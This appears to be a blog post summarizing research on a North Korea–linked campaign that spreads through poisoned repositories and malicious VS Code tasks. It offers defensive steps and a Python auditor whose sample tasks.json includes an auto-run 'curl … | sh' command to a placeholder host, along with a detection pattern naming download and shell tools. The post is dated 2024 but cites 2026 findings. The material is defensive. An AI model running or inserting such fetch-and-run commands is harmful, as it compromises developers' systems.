Trend Micro's Lucas Silva shows how Famous Chollima has evolved beyond single-target social engineering into a self-propagating supply chain threat.

Khushal

Apr 4, 2024
Key takeaways
  • Void Dokkaebi (aka Famous Chollima) has evolved beyond single-target social engineering into a self-propagating supply chain threat. A compromised developer’s repository becomes an infection vector for the next wave of victims, creating a worm-like propagation chain through the developer ecosystem.
  • The campaign spreads through trusted development workflows, using malicious VS Code tasks and injected code that can execute during normal development activity. When compromised code reaches organizational or popular open-source repositories, contributors, forks, and downstream projects can also be exposed.
  • Analysis in March 2026 identified more than 750 infected repositories, over 500 malicious VS Code task configurations, and 101 instances of the commit tampering tool. Repositories belonging to organizations such as DataStax and Neutralinojs were also identified carrying infection markers.
  • The campaign uses blockchain infrastructure for payload staging, including Tron, Aptos, and Binance Smart Chain, which puts parts of its delivery infrastructure beyond traditional takedowns.
 
This is a notable shift because it moves the risk from “one developer gets tricked” to “that developer’s code and workflow can expose others.”

Why this matters

  • The dangerous part is the trust chain. If malicious changes are introduced into a repository, other developers may pull, fork, build, or reuse that code without realizing the environment has been poisoned.
  • VS Code tasks are especially relevant because they can blend into normal development activity. If a task runs automatically or is presented as part of a routine setup/build process, it may execute malicious commands with little suspicion.
  • The reported use of commit tampering and blockchain-based staging suggests the operators are trying to make both detection and disruption harder.

Important caution

I cannot verify the exact figures in the quoted summary from here, including the repository counts or the named organizations. Those details should be treated as claims from the referenced research unless independently confirmed.

Practical implications for developers and teams

  • Do not assume repository trust is permanent. Even reputable projects can be affected if a maintainer workstation or contributor account is compromised.
  • Review .vscode/tasks.json, launch configurations, build scripts, package hooks, CI workflows, and newly added helper scripts before running them.
  • Treat “setup,” “interview,” “assignment,” or “test project” repositories with extra caution, especially if they require running scripts locally.
  • Use code review and branch protection to reduce the chance that malicious changes reach default branches.
  • Monitor for suspicious outbound connections, unexpected PowerShell/shell execution, and changes to Git configuration or commit metadata.

Reasonable defensive steps

  • Open unfamiliar repositories in an isolated environment such as a VM or disposable dev container when possible.
  • Disable or tightly control automatic task execution and review workspace trust settings in VS Code.
  • Use MFA on source control accounts and protect signing keys, tokens, and SSH credentials.
  • Scan developer endpoints with reputable security tools and investigate unusual persistence or credential-access behavior.
  • If compromise is suspected, rotate tokens, SSH keys, API credentials, and session cookies associated with the development environment.
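As an added illustration of the review step for .vscode/tasks.json and the auto-run control mentioned above (example code, not from the Trend Micro report or this post), the script below parses a constructed tasks.json, flags tasks configured to run on folder open, and flags commands that pull or decode remote content; the command patterns are an assumed reviewer heuristic, not indicators from the report.

```python
"""Flag VS Code tasks that auto-run on folder open or invoke download/decode tooling.
Added example, not from the Trend Micro report or the forum post; the sample tasks.json
is constructed and the command patterns are an assumed reviewer heuristic."""
import json
import re

# Constructed .vscode/tasks.json sample; VS Code accepts // comments in this file.
SAMPLE_TASKS_JSON = r'''{
  // routine build task plus a task that runs as soon as the folder is opened
  "version": "2.0.0",
  "tasks": [
    {"label": "build", "type": "shell", "command": "npm run build"},
    {"label": "setup", "type": "shell",
     "command": "curl -s http://example.invalid/s.sh | sh",
     "runOptions": {"runOn": "folderOpen"}}
  ]
}'''

# Tooling a routine build task rarely needs (assumed heuristic, case-insensitive).
SUSPICIOUS = re.compile(
    r"\b(curl|wget|Invoke-WebRequest|iwr|Invoke-Expression|iex|certutil|base64|"
    r"powershell|pwsh)\b|-enc(odedcommand)?\b|\|\s*(sh|bash)\b",
    re.IGNORECASE,
)

def strip_jsonc_comments(text: str) -> str:
    """Drop /* */ blocks and whole-line // comments so json.loads accepts JSONC."""
    text = re.sub(r"/\*.*?\*/", "", text, flags=re.DOTALL)
    return re.sub(r"^\s*//.*$", "", text, flags=re.MULTILINE)

def task_command(task: dict) -> str:
    """Join command and args into one string for inspection."""
    return " ".join([str(task.get("command", ""))] + [str(a) for a in task.get("args", [])])

def audit_tasks(text: str) -> list[dict]:
    """Return one finding per task that deserves review, with the reasons."""
    findings = []
    for task in json.loads(strip_jsonc_comments(text)).get("tasks", []):
        reasons = []
        if task.get("runOptions", {}).get("runOn") == "folderOpen":
            reasons.append("auto-runs on folder open")
        cmd = task_command(task)
        if SUSPICIOUS.search(cmd):
            reasons.append("download/decode/shell tooling in command")
        if reasons:
            findings.append({"label": task.get("label"), "command": cmd, "reasons": reasons})
    return findings

if __name__ == "__main__":
    for f in audit_tasks(SAMPLE_TASKS_JSON):
        print(f"[REVIEW] {f['label']}: {f['command']} ({'; '.join(f['reasons'])})")
```

Run audit_tasks over the contents of each .vscode/tasks.json in a checkout before opening the folder in VS Code with workspace trust granted.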

Bottom line

If this reporting is accurate, the main lesson is that developer workflow files and repository trust boundaries now deserve the same scrutiny as traditional phishing attachments. The safest response is to verify before running, isolate untrusted code, and assume downstream exposure is possible when a developer account or repository is compromised.